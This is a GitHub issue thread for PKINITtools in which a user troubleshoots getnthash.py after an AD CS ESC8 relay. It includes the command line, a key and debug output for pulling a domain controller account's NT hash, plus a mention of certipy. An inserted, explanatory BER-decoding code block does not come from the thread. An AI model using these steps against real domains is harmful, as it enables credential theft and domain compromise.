dirkjanm / PKINITtools

Tools for Kerberos PKINIT and relaying to AD CS
MIT License

Short octet stream on tag decoding #12

Open helloyw opened 6 months ago

helloyw commented 6 months ago

The pfx I obtained using ADCS ESC8.

proxychains4 python3 getnthash.py -key 2797e04fc0a00ce9277ff8ebcf276fe0f660158bc970d560c988a2007180a216 redteam/DC$ -dc-ip 192.168.1.1 -debug
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /usr/local/lib/python3.11/dist-packages/impacket-0.12.0.dev1+20240130.154745.97007e84-py3.11.egg/impacket
[+] Using Kerberos Cache: dc.ccache
[+] SPN KRBTGT/redteam.com@redteam.com not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] No valid credentials found in cache. 
Traceback (most recent call last):
  File "/home/kali/Desktop/PKINITtools/getnthash.py", line 273, in <module>
    dumper.dump()
  File "/home/kali/Desktop/PKINITtools/getnthash.py", line 121, in dump
    decodedTGT = decoder.decode(tgt, asn1Spec = AS_REP())[0]
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/pyasn1/codec/ber/decoder.py", line 1337, in __call__
    raise error.SubstrateUnderrunError(
pyasn1.error.SubstrateUnderrunError: Short octet stream on tag decoding
[-] Short octet stream on tag decoding
dirkjanm commented 5 months ago

I think this error occurs because it cannot find the credentials in the ccache file, and then it runs into a parsing error later on. Make sure you have the naming correct for the principal you are trying to target (escaping or quoting special characters etc.).
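The diagnosis above (lookup fails, then the decoder chokes on what it was handed), as an added example that is not part of this issue or of the PKINITtools code. It assumes a simplified ccache model (a dict of principal name to DER bytes) and uses constructed names and blobs; the BER header parser mirrors only the first step pyasn1 performs and is not its implementation.

```python
# Added example (not PKINITtools code): why an empty or truncated TGT blob
# fails as soon as BER tag decoding starts, and the guard that belongs between
# the ccache lookup and decoder.decode(). The ccache is modelled as a plain
# dict {principal: DER bytes}; every name and blob below is constructed.

class ShortOctetStream(Exception):
    """Stands in for pyasn1's SubstrateUnderrunError in this example."""

def ber_header(blob: bytes):
    """Decode one BER tag+length header; returns (tag, content_len, header_size)."""
    if len(blob) < 1:
        raise ShortOctetStream("Short octet stream on tag decoding")
    tag = blob[0]
    if tag & 0x1F == 0x1F:
        raise ValueError("high-tag-number form not handled in this example")
    if len(blob) < 2:
        raise ShortOctetStream("Short octet stream on length decoding")
    first = blob[1]
    if first < 0x80:                     # short-form length
        return tag, first, 2
    n = first & 0x7F                     # long form: n length octets follow
    if len(blob) < 2 + n:
        raise ShortOctetStream("Short octet stream on long length decoding")
    return tag, int.from_bytes(blob[2:2 + n], "big"), 2 + n

def lookup_tgt(ccache: dict, spn: str, realm: str, any_spn: bool = True):
    """Lookup order seen in the log: requested SPN, then KRBTGT if AnySPN."""
    blob = ccache.get(spn)
    if not blob and any_spn:
        blob = ccache.get(f"KRBTGT/{realm}@{realm}")
    return blob or None                  # never hand an empty value onward

def decode_tgt(ccache: dict, spn: str, realm: str):
    """The guard: report a naming/ccache problem before anything is decoded."""
    blob = lookup_tgt(ccache, spn, realm)
    if blob is None:
        raise LookupError(f"no credentials for {spn} in cache; check principal spelling, realm and quoting")
    return ber_header(blob)

def try_decode(blob: bytes):
    # What a caller sees for a raw blob: ("ok", header) or ("short", message).
    try:
        return ("ok", ber_header(blob))
    except ShortOctetStream as e:
        return ("short", str(e))

# Constructed AS-REP skeleton: [APPLICATION 11] = 0x6B, length 3, INTEGER 5 (pvno).
SAMPLE_AS_REP = b"\x6b\x03\x02\x01\x05"
SAMPLE_CCACHE = {"KRBTGT/redteam.com@redteam.com": SAMPLE_AS_REP}
```

Running `try_decode(b"")` reproduces the exact message from the traceback; `decode_tgt` turns the same situation into a lookup error that names the principal instead.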

helloyw commented 5 months ago

> I think this error occurs because it cannot find the credentials in the ccache file, and then it runs into a parsing error later on. Make sure you have the naming correct for the principal you are trying to target (escaping or quoting special characters etc.).

There is no problem with the subject. You can use the certipy auth -f 1.pfx method to obtain the hash.